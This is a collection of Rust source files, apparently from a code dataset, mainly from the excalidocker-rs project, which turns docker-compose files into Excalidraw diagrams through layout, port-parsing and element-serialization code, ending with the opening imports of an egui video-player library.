fn get_connecting_arrow_xy(alignment_mode: &str, interation_margin: i32) -> (i32, i32) {
    match alignment_mode {
        "vertical" => (0, interation_margin / 2),
        _ => (interation_margin, 0),
    }
}
/// Way-points (relative to the arrow origin) of the polyline connecting a
/// child container to its `i`-th parent, per layout direction.
#[allow(clippy::too_many_arguments)]
fn get_connecting_arrow_points(
    alignment_mode: &str,
    x: &i32,
    y: &i32,
    x_parent: &i32,
    y_parent: &i32,
    height: &i32,
    width: &i32,
    interation_x_margin: &i32,
    scale: &i32,
    level_height: i32,
    i: i32,
) -> Vec<[i32; 2]> {
    if alignment_mode == "vertical" {
        // Route out to a per-arrow "lane" on the left, drop down past the
        // parent, then come back in.
        let lane_x = -2 * (i + 1) * scale;
        let drop_y = level_height + scale;
        vec![[0, 0], [lane_x, 0], [lane_x, drop_y], [-1, drop_y]]
    } else {
        let turn_y = level_height - height;
        let lane_x = x_parent - x + width - interation_x_margin * 2;
        vec![[0, 0], [0, turn_y], [lane_x, turn_y], [lane_x, y_parent - y]]
    }
}
/// Cursor step (dx, dy) applied after placing a container; the vertical
/// layout uses a taller y step between containers.
fn get_alignment_factor_xy(
    alignment_mode: &str,
    x_alignment_factor: i32,
    y_alignment_factor: i32,
    container_width: i32,
    scale: i32,
) -> (i32, i32) {
    let dx = x_alignment_factor * container_width;
    let dy = match alignment_mode {
        // TODO should we increase the step or make it configurable??
        "vertical" => y_alignment_factor * 2 * scale,
        _ => y_alignment_factor * scale,
    };
    (dx, dy)
}
/// Position of the container-side port label relative to its container,
/// for the `i`-th declared port.
fn get_container_port_text_xy(
    alignment_mode: &str,
    height: &i32,
    width: &i32,
    i: i32,
) -> (i32, i32) {
    match alignment_mode {
        "vertical" => (width + 20, height / 2 + i * 40 - 35),
        _ => (20 + i * 80, 80),
    }
}
/// End point of the arrow linking a container to its `i`-th host-port
/// ellipse; the long axis follows the layout direction.
fn get_host_port_arrow_points(alignment_mode: &str, i: i32) -> Vec<[i32; 2]> {
    let along = i + 100;
    let across = i * 80 - 35;
    if alignment_mode == "vertical" {
        vec![[0, 0], [along, across]]
    } else {
        vec![[0, 0], [across, along]]
    }
}
/// Anchor of the host-port arrow on the container: right edge middle for
/// vertical layouts, bottom edge middle otherwise.
fn get_host_port_arrow_xy(
    alignment_mode: &str,
    height: &i32,
    width: &i32,
    container_width: &i32,
) -> (i32, i32) {
    match alignment_mode {
        "vertical" => (*container_width, height / 2),
        _ => (width / 2, *height),
    }
}
/// Offset of the `i`-th host-port ellipse relative to its container:
/// to the right of the container in vertical layouts, below it otherwise.
fn get_container_xy(alignment_mode: &str, width: &i32, scale: &i32, i: i32) -> (i32, i32) {
    match alignment_mode {
        "vertical" => (*width + *scale * 5, i * 80 - 35),
        _ => (i * 80, *scale * 8),
    }
}
/// Bounding rectangle (x, y, width, height) of the frame drawn around a
/// network, computed from the first and last container placed in it and
/// padded per layout mode. Unknown modes yield a degenerate rectangle.
fn get_network_rectangle_xy_width_height(
    alignment_mode: &str,
    first_container_struct: &RectangleStruct,
    last_container_struct: &RectangleStruct,
    x_margin: i32,
    y_margin: i32,
) -> (i32, i32, i32, i32) {
    let (first_x, first_y) = (first_container_struct.x, first_container_struct.y);
    let (last_x, last_y) = (last_container_struct.x, last_container_struct.y);
    let (last_width, last_height) = (last_container_struct.width, last_container_struct.height);
    let span_x = last_x - first_x;
    let span_y = last_y - first_y;
    match alignment_mode {
        "stepped" => (
            first_x - x_margin / 2,
            first_y - y_margin / 2,
            span_x + last_width + x_margin,
            span_y + last_height + y_margin,
        ),
        "vertical" => (
            first_x - x_margin / 4 - 40,
            first_y - y_margin / 4,
            span_x + 2 * 40 + last_width + x_margin,
            span_y + last_height + y_margin / 2,
        ),
        "horizontal" => (
            first_x - x_margin / 2,
            first_y - y_margin / 2 - 40,
            span_x + last_width + x_margin,
            span_y + 2 * 40 + last_height + y_margin,
        ),
        _ => (0_i32, 0_i32, 0_i32, 0_i32),
    }
}
/// Anchor point of the network-name label, per layout mode; unknown
/// modes are placed at the origin.
fn get_network_text_xy(
    alignment_mode: &str,
    first_container_struct: &RectangleStruct,
    last_container_struct: &RectangleStruct,
    x_margin: i32,
    y_margin: i32,
) -> (i32, i32) {
    let first_x = first_container_struct.x;
    let first_y = first_container_struct.y;
    let last_y = last_container_struct.y;
    let last_height = last_container_struct.height;
    match alignment_mode {
        // Stepped and horizontal layouts share the same label placement.
        "stepped" | "horizontal" => (first_x - x_margin / 2, last_y - last_height - y_margin),
        "vertical" => (first_x + x_margin - 6 * 20, first_y),
        _ => (0_i32, 0_i32),
    }
}
/// Splits a docker-compose port declaration into (host, container) parts.
///
/// Supported shapes:
/// - no colon (`"8080"`): the same value is used for both sides
/// - one colon (`"80:8080"`): host before the colon, container after
/// - several colons (e.g. `"127.0.0.1:80:8080"`): split at the right-most colon
fn extract_host_container_ports(port: &str) -> (String, String) {
    let colons: Vec<_> = port.rmatch_indices(':').collect();
    match colons.len() {
        0 => (port.to_string(), port.to_string()),
        1 => {
            let pieces: Vec<&str> = port.split(':').collect();
            (pieces[0].to_string(), pieces[1].to_string())
        }
        _ => {
            // `rmatch_indices` walks from the end of the string, so the first
            // hit is the right-most colon; everything after it is the
            // container port.
            let last_colon = colons[0].0;
            (
                port.chars().take(last_colon).collect(),
                port.chars().skip(last_colon + 1).collect(),
            )
        }
    }
}
/// Returns all container names ordered so every container appears after the
/// containers it depends on. Iteration order is stable across runs because
/// the input is an `IndexMap` (insertion-ordered).
fn find_containers_traversal_order(
    container_name_to_parents: IndexMap<&str, DependencyComponent>,
) -> Vec<String> {
    let mut containers_traversal_order: Vec<String> = Vec::new();
    let mut visited: HashSet<String> = HashSet::new();
    for name in container_name_to_parents.keys() {
        traverse_in_hierarchy(
            name,
            &container_name_to_parents,
            &mut containers_traversal_order,
            &mut visited,
        );
    }
    containers_traversal_order
}
/// For each declared network returns `(network_name, first_container,
/// last_container)`, where first/last follow the dependency-aware traversal
/// order and bound the rectangle drawn around the network.
///
/// Returns an empty vec when no networks are declared. Networks that no
/// container belongs to are skipped instead of panicking.
fn find_containers_in_network(
    container_name_to_parents: IndexMap<&str, DependencyComponent>,
    networks: Option<Vec<String>>,
    container_name_to_container_struct: HashMap<&str, DockerContainer>,
) -> Vec<(String, String, String)> {
    let traversal_order = find_containers_traversal_order(container_name_to_parents);
    let networks = match networks {
        Some(networks) => networks,
        None => return vec![],
    };
    match networks.len() {
        0 => vec![],
        // With a single network every container belongs to it.
        1 => vec![(
            networks.first().unwrap().to_string(),
            traversal_order.first().unwrap().to_string(),
            traversal_order.last().unwrap().to_string(),
        )],
        _ => {
            // Based on `traversal_order`, find the first and the last
            // container for each network.
            let mut result = vec![];
            for network in networks {
                // Borrow the map instead of cloning it for every filtered item
                // (the previous version cloned the whole HashMap per container).
                let containers_within_network: Vec<&String> = traversal_order
                    .iter()
                    .filter(|name| {
                        is_in_network(
                            &container_name_to_container_struct,
                            name.to_string(),
                            network.clone(),
                        )
                    })
                    .collect();
                // A declared-but-unused network has no first/last container.
                if let (Some(first), Some(last)) = (
                    containers_within_network.first(),
                    containers_within_network.last(),
                ) {
                    let (first, last) = (first.to_string(), last.to_string());
                    result.push((network, first, last));
                }
            }
            result
        }
    }
}
/// Returns `true` if a container with the `container_name` name
/// belongs to the `network_name` network.
///
/// Unknown containers and containers without a `networks` section are treated
/// as not belonging to any network; the previous version `unwrap()`ed (and
/// cloned the whole `DockerContainer`) and panicked in both cases.
fn is_in_network(
    container_name_to_container_struct: &HashMap<&str, DockerContainer>,
    container_name: String,
    network_name: String,
) -> bool {
    container_name_to_container_struct
        .get(container_name.as_str())
        .and_then(|container| container.networks.as_ref())
        .map_or(false, |networks| networks.contains(&network_name))
}
/// According to current `exc.app_state.grid_size` setting and text/font size
/// it's possible to accommodate approximately 3 letters in one grid item.
/// The container width is 7 grid items(140) in total and uses only 5 grid items
/// to accommodate the text up to 14 characters(`max_container_name_len`)
/// Empirically found that for
/// 20 | 1.5 letters in grid
/// 28 | 1 letter in grid
/// 36 | 1 letter in grid
///
/// Returns the extra width (in multiples of `scale`) needed when the name is
/// longer than the default container can accommodate, `0` otherwise.
fn find_additional_width(container_name: &str, scale: &i32, font_size: &i32) -> i32 {
    // Signed arithmetic: the old unsigned expression `len / grid - 5 + 3`
    // underflowed for `FONT_SIZE_EXTRA_LARGE` with a 3-4 character name
    // (panic in debug builds, wrap-around in release builds).
    let container_name_len = container_name.len() as i32;
    let (container_name_len_max, elements_per_item_grid) = match *font_size {
        FONT_SIZE_SMALL => (14, 3),
        FONT_SIZE_MEDIUM => (9, 2),
        FONT_SIZE_LARGE => (5, 1),
        FONT_SIZE_EXTRA_LARGE => (2, 1),
        _ => (1, 1),
    };
    // 5 grid items are reserved for text by default; keep a 3-item margin.
    const TEXT_ACCOMMODATION_LEN_DEFAULT: i32 = 5;
    const TEXT_ACCOMMODATION_MARGIN: i32 = 3;
    if container_name_len > container_name_len_max {
        let required_space_for_text = (container_name_len / elements_per_item_grid
            - TEXT_ACCOMMODATION_LEN_DEFAULT
            + TEXT_ACCOMMODATION_MARGIN)
            .max(0);
        scale * required_space_for_text
    } else {
        0
    }
}
/// In-memory representation of a single service entry from a docker-compose
/// file; only the fields excalidocker renders are modelled.
#[derive(Debug, Serialize, Deserialize, Clone)]
struct DockerContainer {
    pub id: String,
    // Image reference, e.g. `postgres:15`.
    image: String,
    command: Option<String>,
    environment: Option<HashMap<String, String>>,
    // Names of services this one depends on (list or mapping form).
    depends_on: Option<Vec<String>>,
    ports: Option<Vec<String>>, // HOST:CONTAINER
    volumes: Option<Vec<String>>,
    networks: Option<Vec<String>>, // TODO consider Set
    // TODO: add other fields
}
impl DockerContainer {
fn new(id: String) -> Self {
Self {
id,
image: String::new(),
command: None,
environment: None,
ports: None,
volumes: None,
depends_on: None,
networks: None,
}
}
fn parse_depends_on(value: &Value) -> Option<Vec<String>> {
match value {
Value::Sequence(depends_on) => {
let depends_on_vec: Vec<String> = depends_on
.iter()
.filter_map(|item| item.as_str().map(|s| s.to_string()))
.collect();
Some(depends_on_vec)
}
Value::Mapping(depends_on) => {
let depends_on_vec: Vec<String> = depends_on
.keys()
.filter_map(|key| key.as_str().map(|s| s.to_string()))
.collect();
Some(depends_on_vec)
}
_ => None,
}
}
fn parse_networks(value: &Value) -> Option<Vec<String>> {
match value {
Value::Sequence(networks) => {
let networks_strings: Vec<String> = networks
.iter()
.filter_map(|network| network.as_str().map(|nw| nw.to_string()))
.collect();
Some(networks_strings)
}
Value::Mapping(networks) => {
let networks_vec: Vec<String> = networks
.keys()
.filter_map(|key| key.as_str().map(|s| s.to_string()))
.collect();
Some(networks_vec)
}
_ => None,
}
}
fn convert_to_container(id: String, value: &Value) -> Self {
let mapping = value.as_mapping().unwrap();
let mut container = DockerContainer::new(id);
for (key, value) in mapping {
match key.as_str().unwrap() {
"image" => {
if let Value::String(image) = value {
container.image = image.clone();
}
}
"command" => {
if let Value::String(command) = value {
container.command = Some(command.clone());
}
}
"environment" => {
if let Value::Mapping(environment) = value {
let mut env_map = HashMap::new();
for (env_key, env_value) in environment {
if let (Value::String(key), Value::String(value)) = (env_key, env_value)
{
env_map.insert(key.clone(), value.clone());
}
}
container.environment = Some(env_map);
}
}
"ports" => {
if let Value::Sequence(ports) = value {
let port_strings = ports
.iter()
.filter_map(|port| port.as_str().map(|p| p.to_string()))
.collect();
container.ports = Some(port_strings);
}
}
"volumes" => {
if let Value::Sequence(volumes) = value {
let volume_strings = volumes
.iter()
| rust | MIT | 1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef | 2026-01-04T20:25:32.074311Z | true |
etolbakov/excalidocker-rs | https://github.com/etolbakov/excalidocker-rs/blob/1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef/src/exporters/excalidraw_config.rs | src/exporters/excalidraw_config.rs | use crate::{
color_utils::COLOR_TO_HEX,
exporters::excalidraw_config::consts::{
NO_X_ALIGNMENT_FACTOR, NO_X_MARGIN, NO_Y_ALIGNMENT_FACTOR, NO_Y_MARGIN, X_ALIGNMENT_FACTOR,
X_MARGIN, Y_ALIGNMENT_FACTOR, Y_MARGIN,
},
};
use serde::{Deserialize, Serialize, Serializer};
/// Default location of the user-editable configuration file.
pub const DEFAULT_CONFIG_PATH: &str = "excalidocker-config.yaml";
/// Built-in configuration used when no config file is supplied;
/// mirrors the structure of `ExcalidrawConfig`.
pub const DEFAULT_CONFIG: &str = r###"
font:
  size: 16
  family: 1
services:
  background_color: "#b2f2bb"
  fill: "hachure"
  edge: "round"
ports:
  background_color: "#a5d8ff"
  fill: "hachure"
connections:
  visible: true
  edge: "sharp"
alignment:
  mode: "stepped"
network:
  visible: true
"###;
/// Root of the excalidocker configuration (deserialized from YAML).
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct ExcalidrawConfig {
    pub font: Font,
    pub services: Services,
    pub ports: Ports,
    pub connections: Connections,
    pub alignment: Alignment,
    pub network: Network,
}
/// Font settings for all rendered labels.
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct Font {
    pub size: i32,
    pub family: i32,
}
/// Styling of service (container) rectangles.
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct Services {
    // Accepts either a `#rrggbb` value or a named color (see the custom serializer).
    #[serde(serialize_with = "serialize_background_color")]
    pub background_color: String,
    pub fill: String,
    pub edge: String,
}
/// Styling of port ellipses.
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct Ports {
    #[serde(serialize_with = "serialize_background_color")]
    pub background_color: String,
    pub fill: String,
}
/// Styling and visibility of dependency arrows.
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct Connections {
    pub visible: bool,
    pub edge: String,
}
/// Visibility of network grouping shapes.
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct Network {
    pub visible: bool,
}
/// Layout mode ("horizontal", "vertical" or "stepped").
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct Alignment {
    pub mode: String,
}
/// Reference from a shape to an element bound to it (e.g. an arrow endpoint).
#[derive(Debug, Clone, Serialize)]
#[serde(rename_all = "camelCase")]
pub struct BoundElement {
    pub id: String,
    #[serde(rename = "type")]
    pub element_type: String,
}
/// Attachment of an arrow end to an element.
#[derive(Debug, Serialize)]
#[serde(rename_all = "camelCase")]
pub struct Binding {
    pub element_id: String,
    pub focus: f32,
    pub gap: u16,
}
/// Excalidraw corner-roundness marker (serialized as `{"type": n}`).
#[derive(Debug, Clone, Serialize)]
#[serde(rename_all = "camelCase")]
pub struct Roundness {
    #[serde(rename = "type")]
    pub roundness_type: i32,
}
/// Builds an arrow-endpoint binding to the element with `element_id`,
/// using the crate-wide default focus (0.05) and gap (1).
pub fn binding(element_id: String) -> Binding {
    let (focus, gap) = (0.05, 1);
    Binding { element_id, focus, gap }
}
/// Builds the back-reference a shape keeps to an arrow attached to it.
pub fn arrow_bounded_element(id: String) -> BoundElement {
    BoundElement {
        id,
        element_type: String::from("arrow"),
    }
}
/// Maps a config `edge` setting to an Excalidraw roundness: `"round"` yields
/// roundness type 3, anything else means sharp corners (`None`).
pub fn roundness(edge: String) -> Option<Roundness> {
    if edge == "round" {
        Some(Roundness { roundness_type: 3 })
    } else {
        None
    }
}
/// Custom serde serializer for color fields: values already in `#rrggbb` form
/// pass through unchanged, while named colors are looked up in `COLOR_TO_HEX`
/// (falling back to the default stroke color for unknown names).
fn serialize_background_color<S: Serializer>(input: &String, s: S) -> Result<S::Ok, S::Error> {
    if input.starts_with('#') {
        return input.serialize(s);
    }
    let hex = COLOR_TO_HEX
        .get(input)
        .unwrap_or(&crate::elements::STROKE_COLOR);
    hex.serialize(s)
}
/// Layout constants shared by the exporters.
pub mod consts {
    // Horizontal/vertical gaps inserted between containers (0 = disabled).
    pub const NO_X_MARGIN: i32 = 0;
    pub const NO_Y_MARGIN: i32 = 0;
    pub const X_MARGIN: i32 = 60;
    pub const Y_MARGIN: i32 = 60;
    // Multipliers switching per-step offsets on (1) or off (0) per axis.
    pub const X_ALIGNMENT_FACTOR: i32 = 1;
    pub const NO_X_ALIGNMENT_FACTOR: i32 = 0;
    pub const Y_ALIGNMENT_FACTOR: i32 = 1;
    pub const NO_Y_ALIGNMENT_FACTOR: i32 = 0;
    // Generated elements stay editable in Excalidraw.
    pub const NON_LOCKED: bool = false;
}
/// Margins and alignment factors for a given alignment mode, returned as
/// `(x_margin, y_margin, x_alignment_factor, y_alignment_factor)`.
///
/// Based on the previously observed per-step offsets:
/// 'horizontal'/'stepped': x += x_margin + container_width; y += y_margin;
/// 'vertical':             x += x_margin; y += y_margin + scale;
pub fn margins(alignment_mode: &str) -> (i32, i32, i32, i32) {
    match alignment_mode {
        "vertical" => (
            NO_X_MARGIN,
            Y_MARGIN,
            NO_X_ALIGNMENT_FACTOR,
            Y_ALIGNMENT_FACTOR,
        ),
        "horizontal" => (
            X_MARGIN,
            NO_Y_MARGIN,
            X_ALIGNMENT_FACTOR,
            NO_Y_ALIGNMENT_FACTOR,
        ),
        // Any other value behaves like the default "stepped" mode.
        _ => (
            X_MARGIN,
            Y_MARGIN,
            X_ALIGNMENT_FACTOR,
            NO_Y_ALIGNMENT_FACTOR,
        ),
    }
}
| rust | MIT | 1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef | 2026-01-04T20:25:32.074311Z | false |
etolbakov/excalidocker-rs | https://github.com/etolbakov/excalidocker-rs/blob/1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef/src/exporters/excalidraw.rs | src/exporters/excalidraw.rs | use serde::Serialize;
use serde_json::{Map, Value};
use super::excalidraw_config::{consts::NON_LOCKED, BoundElement, Roundness};
use crate::exporters::excalidraw_config::{roundness, Binding};
/// Top-level structure of an `.excalidraw` JSON document.
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
pub struct ExcalidrawFile {
    // Always the literal "excalidraw".
    pub r#type: String,
    pub version: i32,
    pub source: Option<String>,
    pub elements: Vec<Element>,
    pub app_state: AppState,
    // Embedded binary files (images); unused by this exporter, kept empty.
    pub files: Map<String, Value>,
}
impl Default for ExcalidrawFile {
fn default() -> Self {
Self {
r#type: "excalidraw".into(),
version: 2,
source: None,
elements: Vec::with_capacity(0),
app_state: Default::default(),
files: Map::with_capacity(0),
}
}
}
/// A single drawable Excalidraw element; the variant name is serialized as
/// the element's `type` tag.
#[derive(Serialize)]
#[serde(rename_all = "camelCase", tag = "type")]
pub enum Element {
    /// A text label.
    #[serde(rename_all = "camelCase")]
    Text {
        x: i32,
        y: i32,
        width: i32,
        height: i32,
        group_ids: Vec<String>,
        angle: i32,
        stroke_color: String,
        background_color: String,
        fill_style: String,
        stroke_width: i32,
        stroke_style: String,
        roughness: i32,
        opacity: i32,
        stroke_sharpness: String,
        locked: bool,
        text: String,
        font_size: i32,
        font_family: i32,
        text_align: String,
        vertical_align: String,
        baseline: i32,
    },
    /// An arrow whose ends are bound to two other elements.
    #[serde(rename_all = "camelCase")]
    Arrow {
        id: String,
        x: i32,
        y: i32,
        width: i32,
        height: i32,
        angle: i32,
        stroke_color: String,
        background_color: String,
        fill_style: String,
        stroke_width: i32,
        stroke_style: String,
        roundness: Option<Roundness>,
        roughness: i32,
        opacity: i32,
        start_binding: Binding,
        end_binding: Binding,
        stroke_sharpness: String,
        locked: bool,
        // Polyline points relative to (x, y).
        points: Vec<[i32; 2]>,
    },
    /// A rectangle (used for containers and network frames).
    #[serde(rename_all = "camelCase")]
    Rectangle {
        id: String,
        x: i32,
        y: i32,
        width: i32,
        height: i32,
        group_ids: Vec<String>,
        bound_elements: Vec<BoundElement>,
        angle: i32,
        stroke_color: String,
        background_color: String,
        fill_style: String,
        stroke_width: i32,
        stroke_style: String,
        roughness: i32,
        roundness: Option<Roundness>,
        opacity: i32,
        stroke_sharpness: String,
        locked: bool,
    },
    /// An ellipse (used for port markers).
    #[serde(rename_all = "camelCase")]
    Ellipse {
        id: String,
        x: i32,
        y: i32,
        width: i32,
        height: i32,
        group_ids: Vec<String>,
        bound_elements: Vec<BoundElement>,
        angle: i32,
        stroke_color: String,
        background_color: String,
        fill_style: String,
        stroke_width: i32,
        stroke_style: String,
        roughness: i32,
        opacity: i32,
        stroke_sharpness: String,
        locked: bool,
    },
}
/// Default styling values shared by all generated elements.
pub mod elements {
    pub const ANGLE: i32 = 0;
    pub const STROKE_COLOR: &str = "#000000";
    pub const NETWORK_COLOR: &str = "#f2f0e6";
    pub const BACKGROUND_COLOR: &str = "transparent";
    pub const FILL_STYLE: &str = "hachure";
    pub const STROKE_WIDTH: i32 = 1;
    pub const STROKE_STYLE: &str = "solid";
    // Dependency arrows use a dashed stroke.
    pub const CONNECTION_STYLE: &str = "dashed";
    pub const OPACITY: i32 = 100;
    pub const STROKE_SHARPNESS: &str = "sharp";
    // The supported font sizes.
    pub const FONT_SIZE_SMALL: i32 = 16;
    pub const FONT_SIZE_MEDIUM: i32 = 20;
    pub const FONT_SIZE_LARGE: i32 = 28;
    pub const FONT_SIZE_EXTRA_LARGE: i32 = 36;
    pub const TEXT_ALIGN_LEFT: &str = "left";
    pub const VERTICAL_ALIGN_TOP: &str = "top";
}
#[allow(clippy::too_many_arguments)]
impl Element {
    /// Fully-parameterized text element (roughness 0, fixed baseline of 15,
    /// never locked).
    pub fn text(
        x: i32,
        y: i32,
        width: i32,
        height: i32,
        group_ids: Vec<String>,
        angle: i32,
        stroke_color: String,
        background_color: String,
        fill_style: String,
        stroke_width: i32,
        stroke_style: String,
        opacity: i32,
        stroke_sharpness: String,
        text: String,
        font_size: i32,
        font_family: i32,
        text_align: String,
        vertical_align: String,
    ) -> Self {
        Self::Text {
            x,
            y,
            width,
            height,
            group_ids,
            angle,
            stroke_color,
            background_color,
            fill_style,
            stroke_width,
            stroke_style,
            roughness: 0,
            opacity,
            stroke_sharpness,
            locked: NON_LOCKED,
            text,
            font_size,
            font_family,
            text_align,
            vertical_align,
            baseline: 15,
        }
    }
    /// Fully-parameterized arrow element bound to a start and an end element.
    pub fn arrow(
        id: String,
        x: i32,
        y: i32,
        width: i32,
        height: i32,
        start_binding: Binding,
        end_binding: Binding,
        angle: i32,
        stroke_color: String,
        background_color: String,
        fill_style: String,
        stroke_width: i32,
        stroke_style: String,
        roundness: Option<Roundness>,
        opacity: i32,
        stroke_sharpness: String,
        points: Vec<[i32; 2]>,
    ) -> Self {
        Self::Arrow {
            id,
            x,
            y,
            width,
            height,
            start_binding,
            end_binding,
            angle,
            stroke_color,
            background_color,
            fill_style,
            stroke_width,
            stroke_style,
            roundness,
            roughness: 2, // hand-drawn look; 0 would be strict lines
            opacity,
            stroke_sharpness,
            locked: NON_LOCKED,
            points,
        }
    }
    /// Fully-parameterized rectangle element.
    pub fn rectangle(
        id: String,
        x: i32,
        y: i32,
        width: i32,
        height: i32,
        group_ids: Vec<String>,
        bound_elements: Vec<BoundElement>,
        angle: i32,
        stroke_color: String,
        background_color: String,
        fill_style: String,
        stroke_width: i32,
        stroke_style: String,
        roundness: Option<Roundness>,
        opacity: i32,
        stroke_sharpness: String,
    ) -> Self {
        Self::Rectangle {
            id,
            x,
            y,
            width,
            height,
            group_ids,
            bound_elements,
            angle,
            stroke_color,
            background_color,
            fill_style,
            stroke_width,
            stroke_style,
            roughness: 2, // hand-drawn look; 0 would be strict lines
            roundness,
            opacity,
            stroke_sharpness,
            locked: NON_LOCKED,
        }
    }
    /// Fully-parameterized ellipse element.
    pub fn ellipse(
        id: String,
        x: i32,
        y: i32,
        width: i32,
        height: i32,
        group_ids: Vec<String>,
        bound_elements: Vec<BoundElement>,
        angle: i32,
        stroke_color: String,
        background_color: String,
        fill_style: String,
        stroke_width: i32,
        stroke_style: String,
        opacity: i32,
        stroke_sharpness: String,
    ) -> Self {
        Self::Ellipse {
            id,
            x,
            y,
            width,
            height,
            group_ids,
            bound_elements,
            angle,
            stroke_color,
            background_color,
            fill_style,
            stroke_width,
            stroke_style,
            roughness: 1, // slightly hand-drawn; 0 would be strict
            opacity,
            stroke_sharpness,
            locked: NON_LOCKED,
        }
    }
    /// Ellipse using the crate-wide default stroke/opacity settings; the
    /// caller picks only background color and fill style.
    pub fn draw_ellipse(
        id: String,
        x: i32,
        y: i32,
        width: i32,
        height: i32,
        group_ids: Vec<String>,
        bound_elements: Vec<BoundElement>,
        background_color: String,
        fill_style: String,
    ) -> Self {
        Self::ellipse(
            id,
            x,
            y,
            width,
            height,
            group_ids,
            bound_elements,
            elements::ANGLE,
            elements::STROKE_COLOR.into(),
            background_color, // caller-chosen instead of the default BACKGROUND_COLOR
            fill_style,       // caller-chosen instead of the default FILL_STYLE
            elements::STROKE_WIDTH,
            elements::STROKE_STYLE.into(),
            elements::OPACITY,
            elements::STROKE_SHARPNESS.into(),
        )
    }
    /// Text element whose width/height are derived from the character and
    /// line counts of `text` (roughly 18px per char, 19px per line).
    pub fn draw_small_monospaced_text(
        text: String,
        x: i32,
        y: i32,
        group_ids: Vec<String>,
        font_size: i32,
        font_family: i32,
    ) -> Self {
        Self::text(
            x,
            y,
            (4 + text.chars().count() * 18) as i32,
            (text.lines().count() * 19) as i32,
            group_ids,
            0,
            elements::STROKE_COLOR.into(),
            elements::BACKGROUND_COLOR.into(),
            elements::FILL_STYLE.into(),
            elements::STROKE_WIDTH,
            elements::STROKE_STYLE.into(),
            elements::OPACITY,
            elements::STROKE_SHARPNESS.into(),
            text,
            font_size,   // caller-chosen (e.g. FONT_SIZE_SMALL)
            font_family, // caller-chosen (e.g. monospace)
            elements::TEXT_ALIGN_LEFT.into(),
            elements::VERTICAL_ALIGN_TOP.into(),
        )
    }
    /// Arrow using the default stroke settings; corner style comes from the
    /// config `edge` value via `roundness`.
    pub fn simple_arrow(
        id: String,
        x: i32,
        y: i32,
        width: i32,
        height: i32,
        stroke_style: String,
        edge: String,
        points: Vec<[i32; 2]>,
        start_binding: Binding,
        end_binding: Binding,
    ) -> Self {
        Self::arrow(
            id,
            x,
            y,
            width, // TODO
            height,
            start_binding,
            end_binding,
            elements::ANGLE,
            elements::STROKE_COLOR.into(),
            elements::BACKGROUND_COLOR.into(),
            elements::FILL_STYLE.into(),
            elements::STROKE_WIDTH,
            stroke_style,
            roundness(edge),
            elements::OPACITY,
            elements::STROKE_SHARPNESS.into(),
            points,
        )
    }
    /// Rectangle using the default stroke settings; background, fill, stroke
    /// style and corner style come from the configuration.
    pub fn simple_rectangle(
        id: String,
        x: i32,
        y: i32,
        width: i32,
        height: i32,
        group_ids: Vec<String>,
        bound_elements: Vec<BoundElement>,
        background_color: String,
        fill_style: String,
        stroke_style: String,
        edge: String,
    ) -> Self {
        Self::rectangle(
            id,
            x,
            y,
            width,
            height,
            group_ids,
            bound_elements,
            elements::ANGLE,
            elements::STROKE_COLOR.into(),
            background_color, // caller-chosen instead of the default BACKGROUND_COLOR
            fill_style,       // caller-chosen instead of the default FILL_STYLE
            elements::STROKE_WIDTH,
            stroke_style,
            roundness(edge),
            elements::OPACITY,
            elements::STROKE_SHARPNESS.into(),
        )
    }
}
/// The Excalidraw canvas state serialized alongside the elements.
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
pub struct AppState {
    // Snapping grid size in pixels.
    pub grid_size: i32,
    pub view_background_color: String,
}
impl Default for AppState {
fn default() -> Self {
Self {
grid_size: 20,
view_background_color: "#ffffff".into(),
}
}
}
| rust | MIT | 1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef | 2026-01-04T20:25:32.074311Z | false |
etolbakov/excalidocker-rs | https://github.com/etolbakov/excalidocker-rs/blob/1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef/src/exporters/mod.rs | src/exporters/mod.rs | pub mod excalidraw;
pub mod excalidraw_config;
| rust | MIT | 1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef | 2026-01-04T20:25:32.074311Z | false |
n00kii/egui-video | https://github.com/n00kii/egui-video/blob/68933f42b45220af92221fb82315b03c87e7efce/src/lib.rs | src/lib.rs | #![warn(missing_docs)]
#![allow(rustdoc::bare_urls)]
#![doc = include_str!("../README.md")]
//! # Simple video player example
//! ```
#![doc = include_str!("../examples/main.rs")]
//! ```
extern crate ffmpeg_the_third as ffmpeg;
use anyhow::Result;
use atomic::Atomic;
use bytemuck::NoUninit;
use chrono::{DateTime, Duration, Utc};
use egui::emath::RectTransform;
use egui::epaint::Shadow;
use egui::load::SizedTexture;
use egui::{
vec2, Align2, Color32, ColorImage, FontId, Image, Pos2, Rect, Response, Rounding, Sense,
Spinner, TextureHandle, TextureOptions, Ui, Vec2,
};
use ffmpeg::error::EAGAIN;
use ffmpeg::ffi::{AVERROR, AV_TIME_BASE};
use ffmpeg::format::context::input::Input;
use ffmpeg::format::{input, Pixel};
use ffmpeg::frame::Audio;
use ffmpeg::media::Type;
use ffmpeg::software::scaling::{context::Context, flag::Flags};
use ffmpeg::util::frame::video::Video;
use ffmpeg::{rescale, Packet, Rational, Rescale};
use ffmpeg::{software, ChannelLayout};
use parking_lot::Mutex;
use ringbuf::traits::{Consumer, Observer, Producer, Split};
use ringbuf::wrap::caching::Caching;
use ringbuf::HeapRb;
use sdl2::audio::{self, AudioCallback, AudioFormat, AudioSpecDesired};
use std::collections::VecDeque;
use std::ops::Deref;
use std::sync::{Arc, Weak};
use std::time::UNIX_EPOCH;
use subtitle::Subtitle;
use timer::{Guard, Timer};
mod subtitle;
#[cfg(feature = "from_bytes")]
use tempfile::NamedTempFile;
#[cfg(feature = "from_bytes")]
use std::io::Write;
/// Formats a playback duration as `MM:SS`, or `HH:MM:SS` once it reaches an hour.
fn format_duration(dur: Duration) -> String {
    let dt = DateTime::<Utc>::from(UNIX_EPOCH) + dur;
    // `%H` always renders a number, so the parse cannot fail.
